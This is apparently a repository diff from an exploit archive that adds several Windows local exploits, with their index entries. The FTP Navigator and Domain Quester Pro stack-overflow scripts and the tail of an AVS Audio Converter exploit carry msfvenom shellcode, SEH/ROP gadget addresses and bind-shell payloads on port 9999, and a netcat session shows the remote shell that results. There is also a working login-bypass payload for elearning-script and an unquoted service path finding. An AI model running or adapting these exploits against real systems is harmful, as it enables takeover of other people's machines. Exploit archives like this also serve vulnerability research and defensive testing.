# - AVSAudioEditor5.dll is the only other module with both ASLR & Rebase disabled.
|
||||
# - The enabled SafeSEH blocks us from using it for a SEH overwrite, but we can still jump
|
||||
# to it with a vanilla EIP overwrite; due to overwriting a return address on the stack.
|
||||
# - After bypassing the ESI read exception, our stack will look like this after the EIP overwrite:
|
||||
# ECX=0018FA60 ESP=0018FA60 (Stack locations will vary)
|
||||
# 0018FA54 45454545 EEEE // [296]
|
||||
# 0018FA58 45454545 EEEE // [300]
|
||||
# 0018FA5C 1006563E V... // [304] eip var # Pointer to 'pop+ret'
|
||||
# *0018FA60 00000000 .... // [308] esi var # our esi address gets replaced by 4 nulls
|
||||
# 0018FA64 1006A438 8... // [312] jmpEsp var # Pointer to 'jmp esp'
|
||||
# 0018FA68 E510EC10 .... // [316] fixStack var # ASM to fix the Stack so shellcode will work
|
||||
# [AVSAudioEditor5.dll] (C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSAudioEditor5.dll)
|
||||
# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll |
|
||||
# 0x10000000 | 0x100a1000 | False | True | False | False | False |
|
||||
# 0x1006563e : pop esi # ret | ascii {PAGE_EXECUTE_READ} [AVSAudioEditor5.dll]
|
||||
eip = '\x3e\x56\x06\x10' # pop+ret
|
||||
# - After pop+ret, ESP=0018FA68
|
||||
esi = '\x10\x10\x08\x10' # [AVSAudioEditor5.dll] | .data | RW
|
||||
# 0x1006a438 : jmp esp | {PAGE_EXECUTE_READ} [AVSAudioEditor5.dll]
|
||||
# - the esi var address is just a random, readable memory location that will not move; to bypass the exception.
|
||||
jmpEsp = '\x38\xa4\x06\x10' # jmp esp pointer
|
||||
# EBP is 45454545 at this point. Needs to be fixed for most shellcode payloads to work properly.
|
||||
fixStack = '\x83\xEC\x10' # sub esp, 0x10
|
||||
fixStack += '\x89\xE5' # mov ebp, esp
|
||||
fixStack += '\x83\xEC\x60' # sub esp, 0x60
|
||||
#msfvenom -p windows/shell_bind_tcp LPORT=9999 -v shellcode -a x86 --platform windows -b '\x00' --format python
|
||||
# x86/shikata_ga_nai succeeded with size 355 (iteration=0)
|
||||
shellcode = b""
|
||||
shellcode += b"\xbe\xd8\x49\x8d\x72\xd9\xe5\xd9\x74\x24\xf4"
|
||||
shellcode += b"\x5a\x31\xc9\xb1\x53\x31\x72\x12\x83\xea\xfc"
|
||||
shellcode += b"\x03\xaa\x47\x6f\x87\xb6\xb0\xed\x68\x46\x41"
|
||||
shellcode += b"\x92\xe1\xa3\x70\x92\x96\xa0\x23\x22\xdc\xe4"
|
||||
shellcode += b"\xcf\xc9\xb0\x1c\x5b\xbf\x1c\x13\xec\x0a\x7b"
|
||||
shellcode += b"\x1a\xed\x27\xbf\x3d\x6d\x3a\xec\x9d\x4c\xf5"
|
||||
shellcode += b"\xe1\xdc\x89\xe8\x08\x8c\x42\x66\xbe\x20\xe6"
|
||||
shellcode += b"\x32\x03\xcb\xb4\xd3\x03\x28\x0c\xd5\x22\xff"
|
||||
shellcode += b"\x06\x8c\xe4\xfe\xcb\xa4\xac\x18\x0f\x80\x67"
|
||||
shellcode += b"\x93\xfb\x7e\x76\x75\x32\x7e\xd5\xb8\xfa\x8d"
|
||||
shellcode += b"\x27\xfd\x3d\x6e\x52\xf7\x3d\x13\x65\xcc\x3c"
|
||||
shellcode += b"\xcf\xe0\xd6\xe7\x84\x53\x32\x19\x48\x05\xb1"
|
||||
shellcode += b"\x15\x25\x41\x9d\x39\xb8\x86\x96\x46\x31\x29"
|
||||
shellcode += b"\x78\xcf\x01\x0e\x5c\x8b\xd2\x2f\xc5\x71\xb4"
|
||||
shellcode += b"\x50\x15\xda\x69\xf5\x5e\xf7\x7e\x84\x3d\x90"
|
||||
shellcode += b"\xb3\xa5\xbd\x60\xdc\xbe\xce\x52\x43\x15\x58"
|
||||
shellcode += b"\xdf\x0c\xb3\x9f\x20\x27\x03\x0f\xdf\xc8\x74"
|
||||
shellcode += b"\x06\x24\x9c\x24\x30\x8d\x9d\xae\xc0\x32\x48"
|
||||
shellcode += b"\x5a\xc8\x95\x23\x79\x35\x65\x94\x3d\x95\x0e"
|
||||
shellcode += b"\xfe\xb1\xca\x2f\x01\x18\x63\xc7\xfc\xa3\xac"
|
||||
shellcode += b"\x17\x88\x42\xd8\x37\xdc\xdd\x74\xfa\x3b\xd6"
|
||||
shellcode += b"\xe3\x05\x6e\x4e\x83\x4e\x78\x49\xac\x4e\xae"
|
||||
shellcode += b"\xfd\x3a\xc5\xbd\x39\x5b\xda\xeb\x69\x0c\x4d"
|
||||
shellcode += b"\x61\xf8\x7f\xef\x76\xd1\x17\x8c\xe5\xbe\xe7"
|
||||
shellcode += b"\xdb\x15\x69\xb0\x8c\xe8\x60\x54\x21\x52\xdb"
|
||||
shellcode += b"\x4a\xb8\x02\x24\xce\x67\xf7\xab\xcf\xea\x43"
|
||||
shellcode += b"\x88\xdf\x32\x4b\x94\x8b\xea\x1a\x42\x65\x4d"
|
||||
shellcode += b"\xf5\x24\xdf\x07\xaa\xee\xb7\xde\x80\x30\xc1"
|
||||
shellcode += b"\xde\xcc\xc6\x2d\x6e\xb9\x9e\x52\x5f\x2d\x17"
|
||||
shellcode += b"\x2b\xbd\xcd\xd8\xe6\x05\xfd\x92\xaa\x2c\x96"
|
||||
shellcode += b"\x7a\x3f\x6d\xfb\x7c\xea\xb2\x02\xff\x1e\x4b"
|
||||
shellcode += b"\xf1\x1f\x6b\x4e\xbd\xa7\x80\x22\xae\x4d\xa6"
|
||||
shellcode += b"\x91\xcf\x47"
|
||||
payload = offEdx+edx+nSEH+SEH+offEip+eip+esi+jmpEsp+fixStack+shellcode
|
||||
# offsets: 0 260 264 268 272 304 308 312 316 324
|
||||
f = open(File, 'w') # open file for write
|
||||
f.write(payload)
|
||||
f.close() # close the file
|
||||
print blt + File + " created successfully "
|
||||
# root@kali# nc <Victim IP> 9999
|
||||
# Microsoft Windows [Version 6.1.7601]
|
||||
# C:\Program Files (x86)\AVS4YOU\AVSAudioConverter>
|
||||
except:
|
||||
print err + File + ' failed to create'
|
90
exploits/windows/local/47812.py
Executable file
90
exploits/windows/local/47812.py
Executable file
|
@ -0,0 +1,90 @@
|
|||
# Exploit Title: FTP Navigator 8.03 - Stack Overflow (SEH)
|
||||
# Date: December 28th, 2019
|
||||
# Exploit Author: boku
|
||||
# Discovered by: Chris Inzinga
|
||||
# Original DoS: FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)
|
||||
# Original DoS Link: https://www.exploit-db.com/exploits/47794
|
||||
# Software Vendor: http://www.internet-soft.com/
|
||||
# Software Link: https://www.softpedia.com/dyn-postdownload.php/5edd515b8045f156a9dd48599c2539e5/5dfa4560/d0c/0/1
|
||||
# Version: Version 8.03
|
||||
# Tested on: Microsoft Windows 7 Enterprise - 6.1.7601 Service Pack 1 Build 7601 (x86-64)
|
||||
# Recreate:
|
||||
|
||||
#!/usr/bin/python
|
||||
# 1) Generate 'poc.txt' payload using python 2.7.x
|
||||
# 2) On target Windows machine, open the file 'poc.txt' with notepad, then Select-All & Copy
|
||||
# 3) Install & Open FTP Navigator v8.03
|
||||
# 4) Go to Menu Bar > FTP-Server Drop-down > click Custom Command
|
||||
# - A textbox will appear on the bottom of the right window
|
||||
# 5) Paste payload from generated txt file into textbox
|
||||
# 6) Click "Do it"
|
||||
# - The program will crash & calculator will open
|
||||
blt = '\033[92m[\033[0m+\033[92m]\033[0m ' # bash green success bullet
|
||||
err = '\033[91m[\033[0m!\033[91m]\033[0m ' # bash red error bullet
|
||||
try:
|
||||
nops = '\x90'*400
|
||||
# msfvenom -p windows/exec CMD='calc' -b '\x00' --platform windows -v shellcode -a x86 -f python -e x86/alpha_upper
|
||||
#x86/alpha_upper succeeded with size 447 (iteration=0)
|
||||
shellcode = b""
|
||||
shellcode += b"\x89\xe7\xda\xd6\xd9\x77\xf4\x58\x50\x59\x49"
|
||||
shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
|
||||
shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
|
||||
shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
|
||||
shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
|
||||
shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
|
||||
shellcode += b"\x49\x4b\x4c\x4a\x48\x4d\x52\x35\x50\x35\x50"
|
||||
shellcode += b"\x33\x30\x53\x50\x4c\x49\x4d\x35\x50\x31\x39"
|
||||
shellcode += b"\x50\x52\x44\x4c\x4b\x50\x50\x56\x50\x4c\x4b"
|
||||
shellcode += b"\x46\x32\x44\x4c\x4c\x4b\x31\x42\x42\x34\x4c"
|
||||
shellcode += b"\x4b\x42\x52\x46\x48\x34\x4f\x4f\x47\x51\x5a"
|
||||
shellcode += b"\x51\x36\x36\x51\x4b\x4f\x4e\x4c\x37\x4c\x33"
|
||||
shellcode += b"\x51\x33\x4c\x44\x42\x56\x4c\x57\x50\x4f\x31"
|
||||
shellcode += b"\x58\x4f\x54\x4d\x45\x51\x4f\x37\x5a\x42\x4b"
|
||||
shellcode += b"\x42\x36\x32\x30\x57\x4c\x4b\x51\x42\x34\x50"
|
||||
shellcode += b"\x4c\x4b\x50\x4a\x57\x4c\x4c\x4b\x30\x4c\x32"
|
||||
shellcode += b"\x31\x34\x38\x4b\x53\x57\x38\x43\x31\x4e\x31"
|
||||
shellcode += b"\x46\x31\x4c\x4b\x31\x49\x51\x30\x45\x51\x48"
|
||||
shellcode += b"\x53\x4c\x4b\x47\x39\x44\x58\x4b\x53\x37\x4a"
|
||||
shellcode += b"\x31\x59\x4c\x4b\x56\x54\x4c\x4b\x35\x51\x4e"
|
||||
shellcode += b"\x36\x50\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
|
||||
shellcode += b"\x34\x4d\x45\x51\x59\x57\x30\x38\x4b\x50\x43"
|
||||
shellcode += b"\x45\x5a\x56\x55\x53\x33\x4d\x4a\x58\x57\x4b"
|
||||
shellcode += b"\x53\x4d\x31\x34\x54\x35\x4a\x44\x36\x38\x4c"
|
||||
shellcode += b"\x4b\x31\x48\x36\x44\x45\x51\x38\x53\x35\x36"
|
||||
shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x35"
|
||||
shellcode += b"\x4c\x53\x31\x49\x43\x4c\x4b\x44\x44\x4c\x4b"
|
||||
shellcode += b"\x55\x51\x38\x50\x4d\x59\x47\x34\x31\x34\x56"
|
||||
shellcode += b"\x44\x51\x4b\x51\x4b\x55\x31\x46\x39\x31\x4a"
|
||||
shellcode += b"\x30\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x50"
|
||||
shellcode += b"\x5a\x4c\x4b\x42\x32\x4a\x4b\x4c\x4d\x31\x4d"
|
||||
shellcode += b"\x53\x5a\x33\x31\x4c\x4d\x4b\x35\x48\x32\x33"
|
||||
shellcode += b"\x30\x55\x50\x33\x30\x56\x30\x32\x48\x30\x31"
|
||||
shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x38\x55\x4f"
|
||||
shellcode += b"\x4b\x4c\x30\x4f\x45\x59\x32\x56\x36\x55\x38"
|
||||
shellcode += b"\x59\x36\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x59"
|
||||
shellcode += b"\x45\x37\x4c\x54\x46\x43\x4c\x54\x4a\x4d\x50"
|
||||
shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x33\x35\x4f\x4b\x51"
|
||||
shellcode += b"\x57\x32\x33\x53\x42\x52\x4f\x42\x4a\x35\x50"
|
||||
shellcode += b"\x50\x53\x4b\x4f\x39\x45\x42\x43\x53\x51\x42"
|
||||
shellcode += b"\x4c\x32\x43\x53\x30\x41\x41"
|
||||
jmp2nops = '\xe8\xff\xff\xff\xff' # call +4 // This call will land us at the last \xff of our call instruction
|
||||
jmp2nops += '\xc3' # ret/inc ebx // Since EIP is at \xff after call, this will be interpruted as: \xff\xc3 =inc ebx (a nop instruction)
|
||||
jmp2nops += '\x59' # pop ecx // Pop the memory location from the call instruction that was pushed onto the stack into the ECX register
|
||||
jmp2nops += '\x31\xd2' # xor edx, edx // Clear the EDX register. We are going to jump to the beginning of our buffer.
|
||||
jmp2nops += '\x66\x81\xca\xfc\x0f' # or dx, 4092 // EDX is now equal to 0x00000ffc
|
||||
jmp2nops += '\x66\x29\xd1' # sub ex, dx // We subtract 4092 bytes from our memory location in the ECX register.
|
||||
jmp2nops += '\xff\xe1' # jmp ecx // Now we jump back to the beginning of our buffer; into our NOP sled.
|
||||
offset = '\x41' * (4112-len(nops+shellcode+jmp2nops))
|
||||
nSEH = '\xeb\xeb\x90\x90' # jmp short -22 (to jmp2nops)
|
||||
# 0x00457576 [ftpnavi.exe] : pop edx # pop ebx # ret
|
||||
# | Rebase: False | ASLR: False | SafeSEH: False
|
||||
# | (c:\FTP Navigator\ftpnavi.exe) | startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ}
|
||||
SEH = '\x76\x75\x45' # SEH 3 byte overwrite
|
||||
payload = nops+shellcode+offset+jmp2nops+nSEH+SEH
|
||||
File = 'poc.txt'
|
||||
f = open(File, 'w') # open file for write
|
||||
f.write(payload)
|
||||
f.close() # close the file
|
||||
print blt + File + " created successfully "
|
||||
except:
|
||||
print err + File + ' failed to create'
|
24
exploits/windows/local/47818.txt
Normal file
24
exploits/windows/local/47818.txt
Normal file
|
@ -0,0 +1,24 @@
|
|||
# Exploit Title: Wing FTP Server 6.0.7 - Unquoted Service Path
|
||||
# Date: 2019-12-30
|
||||
# Exploit Author: Nawaf Alkeraithe
|
||||
# Vendor Homepage: https://www.wftpserver.com/
|
||||
# Version: 6.0.7
|
||||
# Tested on: Windows 10
|
||||
# CVE : N/A
|
||||
|
||||
# PoC:
|
||||
|
||||
C:\Users\user>sc qc "Wing FTP Server"
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: Wing FTP Server
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files (x86)\Wing FTP
|
||||
Server\WFTPServer.exe service
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : Wing FTP Server
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
82
exploits/windows/local/47825.py
Executable file
82
exploits/windows/local/47825.py
Executable file
|
@ -0,0 +1,82 @@
|
|||
# Exploit Title: Domain Quester Pro 6.02 - Stack Overflow (SEH)
|
||||
# Date: 2019-12-26
|
||||
# Exploit Author: boku
|
||||
# Software Vendor: http://www.internet-soft.com/
|
||||
# Software Link: http://www.internet-soft.com/DEMO/questerprosetup.exe
|
||||
# Version: Version 6.02
|
||||
# Tested on: Microsoft Windows 7 Enterprise - 6.1.7601 Service Pack 1 Build 7601 (x86-64)
|
||||
# Recreate:
|
||||
# 1) Generate 'bind9999.txt' payload using python 2.7.x
|
||||
# 2) On target Windows machine, open the file 'bind9999.txt' with notepad, then Select-All & Copy
|
||||
# 3) Install & Open Domain Quester Pro 6.02
|
||||
# 4) Under 'Domain Name Keywords', click 'Add'
|
||||
# - A textbox will appear
|
||||
# 5) Paste payload from generated txt file into textbox
|
||||
# 6) Click 'OK'
|
||||
# - The program will freeze & a bind shell will be listening on tcp port 9999, on all interfaces
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
File = 'bind9999.txt'
|
||||
try:
|
||||
# SEH triggered by exception 'Access violation when reading [eax]'
|
||||
# - Crash at Instruction: 00403AB8 8B10 mov edx, dword ptr ds:[eax]
|
||||
# - EAX is overwritten by our overflow
|
||||
# - SEH overwriten at 4116 bytes
|
||||
# Bad Characters: '\x00\x02\x03\x04\x05\x06\x07\x08\x0a\x0c\x0d'
|
||||
# - The above bytes truncate the buffer
|
||||
nops = '\x90'*400
|
||||
# msfvenom -p windows/shell_bind_tcp LPORT=9999 -v shellcode -a x86 --platform windows -b '\x00\x02\x03\x04\x05\x06\x07\x08\x0a\x0c\x0d' --format python
|
||||
# x86/call4_dword_xor chosen with final size 352
|
||||
shellcode = b""
|
||||
shellcode += b"\x2b\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0"
|
||||
shellcode += b"\x5e\x81\x76\x0e\xa3\xda\x2f\x1f\x83\xee\xfc"
|
||||
shellcode += b"\xe2\xf4\x5f\x32\xad\x1f\xa3\xda\x4f\x96\x46"
|
||||
shellcode += b"\xeb\xef\x7b\x28\x8a\x1f\x94\xf1\xd6\xa4\x4d"
|
||||
shellcode += b"\xb7\x51\x5d\x37\xac\x6d\x65\x39\x92\x25\x83"
|
||||
shellcode += b"\x23\xc2\xa6\x2d\x33\x83\x1b\xe0\x12\xa2\x1d"
|
||||
shellcode += b"\xcd\xed\xf1\x8d\xa4\x4d\xb3\x51\x65\x23\x28"
|
||||
shellcode += b"\x96\x3e\x67\x40\x92\x2e\xce\xf2\x51\x76\x3f"
|
||||
shellcode += b"\xa2\x09\xa4\x56\xbb\x39\x15\x56\x28\xee\xa4"
|
||||
shellcode += b"\x1e\x75\xeb\xd0\xb3\x62\x15\x22\x1e\x64\xe2"
|
||||
shellcode += b"\xcf\x6a\x55\xd9\x52\xe7\x98\xa7\x0b\x6a\x47"
|
||||
shellcode += b"\x82\xa4\x47\x87\xdb\xfc\x79\x28\xd6\x64\x94"
|
||||
shellcode += b"\xfb\xc6\x2e\xcc\x28\xde\xa4\x1e\x73\x53\x6b"
|
||||
shellcode += b"\x3b\x87\x81\x74\x7e\xfa\x80\x7e\xe0\x43\x85"
|
||||
shellcode += b"\x70\x45\x28\xc8\xc4\x92\xfe\xb2\x1c\x2d\xa3"
|
||||
shellcode += b"\xda\x47\x68\xd0\xe8\x70\x4b\xcb\x96\x58\x39"
|
||||
shellcode += b"\xa4\x25\xfa\xa7\x33\xdb\x2f\x1f\x8a\x1e\x7b"
|
||||
shellcode += b"\x4f\xcb\xf3\xaf\x74\xa3\x25\xfa\x75\xab\x83"
|
||||
shellcode += b"\x7f\xfd\x5e\x9a\x7f\x5f\xf3\xb2\xc5\x10\x7c"
|
||||
shellcode += b"\x3a\xd0\xca\x34\xb2\x2d\x1f\x84\xd5\xa6\xf9"
|
||||
shellcode += b"\xc9\xca\x79\x48\xcb\x18\xf4\x28\xc4\x25\xfa"
|
||||
shellcode += b"\x48\xcb\x6d\xc6\x27\x5c\x25\xfa\x48\xcb\xae"
|
||||
shellcode += b"\xc3\x24\x42\x25\xfa\x48\x34\xb2\x5a\x71\xee"
|
||||
shellcode += b"\xbb\xd0\xca\xcb\xb9\x42\x7b\xa3\x53\xcc\x48"
|
||||
shellcode += b"\xf4\x8d\x1e\xe9\xc9\xc8\x76\x49\x41\x27\x49"
|
||||
shellcode += b"\xd8\xe7\xfe\x13\x1e\xa2\x57\x6b\x3b\xb3\x1c"
|
||||
shellcode += b"\x2f\x5b\xf7\x8a\x79\x49\xf5\x9c\x79\x51\xf5"
|
||||
shellcode += b"\x8c\x7c\x49\xcb\xa3\xe3\x20\x25\x25\xfa\x96"
|
||||
shellcode += b"\x43\x94\x79\x59\x5c\xea\x47\x17\x24\xc7\x4f"
|
||||
shellcode += b"\xe0\x76\x61\xdf\xaa\x01\x8c\x47\xb9\x36\x67"
|
||||
shellcode += b"\xb2\xe0\x76\xe6\x29\x63\xa9\x5a\xd4\xff\xd6"
|
||||
shellcode += b"\xdf\x94\x58\xb0\xa8\x40\x75\xa3\x89\xd0\xca"
|
||||
jmp2nops = '\xe8\xff\xff\xff\xff' # call +4 // This call will land us at the last \xff of our call instruction
|
||||
jmp2nops += '\xc3' # ret/inc ebx // Since EIP is at \xff after call, this will be interpruted as \xff\xc3 (inc ebx)
|
||||
jmp2nops += '\x59' # pop ecx // Pop the memory location from the call instruction that was pushed onto the stack into the ECX register
|
||||
jmp2nops += '\x31\xd2' # xor edx, edx // Clear the EDX register. We are going to jump to the beginning of our buffer.
|
||||
jmp2nops += '\x66\x81\xca\x04\x10' # or dx, 4090 // EDX is now equal to 0x00004100.
|
||||
jmp2nops += '\x66\x29\xd1' # sub ex, dx // We subtract 4100 bytes from our memory location in the ECX register.
|
||||
jmp2nops += '\xff\xe1' # jmp ecx // Now we jump back to the beginning of our buffer; into our NOP sled.
|
||||
offset = '\x41' * (4116-len(nops+shellcode+jmp2nops))
|
||||
nSEH = '\xeb\xeb\x90\x90' # jmp short -22 (to jmp2nops)
|
||||
# 0x00400000 [questpro.exe] | Rebase: False | ASLR: False | SafeSEH: False
|
||||
# 0x0042666b [questpro.exe] | pop ecx + pop ebp + ret | {PAGE_EXECUTE_READ}
|
||||
SEH = '\x6b\x66\x42' # SEH 3 byte overwrite
|
||||
payload = nops+shellcode+offset+jmp2nops+nSEH+SEH
|
||||
f = open(File, 'w')
|
||||
f.write(payload)
|
||||
f.close()
|
||||
print File + ' created successfully '
|
||||
except:
|
||||
print File + ' failed to create'
|
31
exploits/windows/webapps/47811.txt
Normal file
31
exploits/windows/webapps/47811.txt
Normal file
|
@ -0,0 +1,31 @@
|
|||
# Exploit Title: elearning-script 1.0 - Authentication Bypass
|
||||
# Author: riamloo
|
||||
# Date: 2019-12-29
|
||||
# Vendor Homepage: https://github.com/amitkolloldey/elearning-script
|
||||
# Software Link: https://github.com/amitkolloldey/elearning-script/archive/master.zip
|
||||
# Version: 1
|
||||
# CVE: N/A
|
||||
# Tested on: Win 10
|
||||
|
||||
# Discription:
|
||||
# E Learning Blog Developed In Raw PHP
|
||||
# Vulnerability: Attacker can bypass login page and access to dashboard page
|
||||
# vulnerable file : /login.php
|
||||
# Parameter & Payload: '=''or'
|
||||
# Proof of Concept:
|
||||
http://localhost/elearning-script-master/login.php
|
||||
|
||||
POST /elearning-script-master/login.php HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: multipart/form-data;
|
||||
Content-Length: 445
|
||||
Referer: http://localhost/elearning-script-master/login.php
|
||||
Cookie: PHPSESSID=a81sp8jg62nzxs8icvbf44ep3iu
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
'=''or'
|
|
@ -10849,6 +10849,15 @@ id,file,description,date,author,type,platform,port
|
|||
47780,exploits/openbsd/local/47780.txt,"OpenBSD 6.x - Dynamic Loader Privilege Escalation",2019-12-16,"Qualys Corporation",local,openbsd,
|
||||
47788,exploits/windows/local/47788.py,"AVS Audio Converter 9.1 - 'Exit folder' Buffer Overflow",2019-12-18,ZwX,local,windows,
|
||||
47802,exploits/windows/local/47802.py,"Prime95 Version 29.8 build 6 - Buffer Overflow (SEH)",2019-12-23,stresser,local,windows,
|
||||
47803,exploits/openbsd/local/47803.rb,"OpenBSD - Dynamic Loader chpass Privilege Escalation (Metasploit)",2019-12-30,Metasploit,local,openbsd,
|
||||
47804,exploits/linux/local/47804.rb,"Reptile Rootkit - reptile_cmd Privilege Escalation (Metasploit)",2019-12-30,Metasploit,local,linux,
|
||||
47805,exploits/windows/local/47805.rb,"Microsoft UPnP - Local Privilege Elevation (Metasploit)",2019-12-30,Metasploit,local,windows,
|
||||
47810,exploits/windows/local/47810.py,"AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)",2019-12-30,boku,local,windows,
|
||||
47812,exploits/windows/local/47812.py,"FTP Navigator 8.03 - Stack Overflow (SEH)",2019-12-30,boku,local,windows,
|
||||
47818,exploits/windows/local/47818.txt,"Wing FTP Server 6.0.7 - Unquoted Service Path",2019-12-30,"Nawaf Alkeraithe",local,windows,
|
||||
47825,exploits/windows/local/47825.py,"Domain Quester Pro 6.02 - Stack Overflow (SEH)",2019-12-30,boku,local,windows,
|
||||
47829,exploits/freebsd/local/47829.sh,"FreeBSD-SA-19:02.fd - Privilege Escalation",2019-12-30,"Karsten König",local,freebsd,
|
||||
47830,exploits/freebsd/local/47830.sh,"FreeBSD-SA-19:15.mqueuefs - Privilege Escalation",2019-12-30,"Karsten König",local,freebsd,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -42108,3 +42117,22 @@ id,file,description,date,author,type,platform,port
|
|||
47796,exploits/hardware/webapps/47796.txt,"Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation",2019-12-19,Vulnerability-Lab,webapps,hardware,
|
||||
47798,exploits/php/webapps/47798.txt,"phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting",2019-12-20,"Chris Inzinga",webapps,php,
|
||||
47800,exploits/php/webapps/47800.py,"WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service",2019-12-17,roddux,webapps,php,
|
||||
47806,exploits/hardware/webapps/47806.txt,"HomeAutomation 3.3.2 - Persistent Cross-Site Scripting",2019-12-30,LiquidWorm,webapps,hardware,
|
||||
47807,exploits/php/webapps/47807.txt,"HomeAutomation 3.3.2 - Authentication Bypass",2019-12-30,LiquidWorm,webapps,php,
|
||||
47808,exploits/php/webapps/47808.txt,"HomeAutomation 3.3.2 - Cross-Site Request Forgery (Add Admin)",2019-12-30,LiquidWorm,webapps,php,
|
||||
47809,exploits/php/webapps/47809.txt,"HomeAutomation 3.3.2 - Remote Code Execution",2019-12-30,LiquidWorm,webapps,php,
|
||||
47811,exploits/windows/webapps/47811.txt,"elearning-script 1.0 - Authentication Bypass",2019-12-30,riamloo,webapps,windows,
|
||||
47813,exploits/hardware/webapps/47813.txt,"XEROX WorkCentre 6655 Printer - Cross-Site Request Forgery (Add Admin)",2019-12-30,"Ismail Tasdelen",webapps,hardware,
|
||||
47814,exploits/php/webapps/47814.txt,"Thrive Smart Home 1.1 - Authentication Bypass",2019-12-30,LiquidWorm,webapps,php,
|
||||
47815,exploits/hardware/webapps/47815.txt,"XEROX WorkCentre 7855 Printer - Cross-Site Request Forgery (Add Admin)",2019-12-30,"Ismail Tasdelen",webapps,hardware,
|
||||
47816,exploits/hardware/webapps/47816.txt,"XEROX WorkCentre 7830 Printer - Cross-Site Request Forgery (Add Admin)",2019-12-30,"Ismail Tasdelen",webapps,hardware,
|
||||
47817,exploits/hardware/webapps/47817.txt,"WEMS BEMS 21.3.1 - Undocumented Backdoor Account",2019-12-30,LiquidWorm,webapps,hardware,
|
||||
47819,exploits/hardware/webapps/47819.txt,"AVE DOMINAplus 1.10.x - Credential Disclosure",2019-12-30,LiquidWorm,webapps,hardware,
|
||||
47820,exploits/hardware/webapps/47820.txt,"AVE DOMINAplus 1.10.x - Unauthenticated Remote Reboot",2019-12-30,LiquidWorm,webapps,hardware,
|
||||
47821,exploits/hardware/webapps/47821.txt,"AVE DOMINAplus 1.10.x - Cross-Site Request Forgery (enable/disable alarm)",2019-12-30,LiquidWorm,webapps,hardware,
|
||||
47822,exploits/hardware/webapps/47822.txt,"AVE DOMINAplus 1.10.x - Authentication Bypass",2019-12-30,LiquidWorm,webapps,hardware,
|
||||
47823,exploits/hardware/webapps/47823.txt,"Heatmiser Netmonitor 3.03 - Hardcoded Credentials",2019-12-30,"Ismail Tasdelen",webapps,hardware,
|
||||
47824,exploits/hardware/webapps/47824.txt,"MyDomoAtHome REST API Domoticz ISS Gateway 0.2.40 - Information Disclosure",2019-12-30,LiquidWorm,webapps,hardware,
|
||||
47826,exploits/hardware/webapps/47826.txt,"RICOH SP 4510SF Printer - HTML Injection",2019-12-30,"Ismail Tasdelen",webapps,hardware,
|
||||
47827,exploits/hardware/webapps/47827.txt,"RICOH Web Image Monitor 1.09 - HTML Injection",2019-12-30,"Ismail Tasdelen",webapps,hardware,
|
||||
47828,exploits/hardware/webapps/47828.txt,"Heatmiser Netmonitor 3.03 - HTML Injection",2019-12-30,"Ismail Tasdelen",webapps,hardware,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue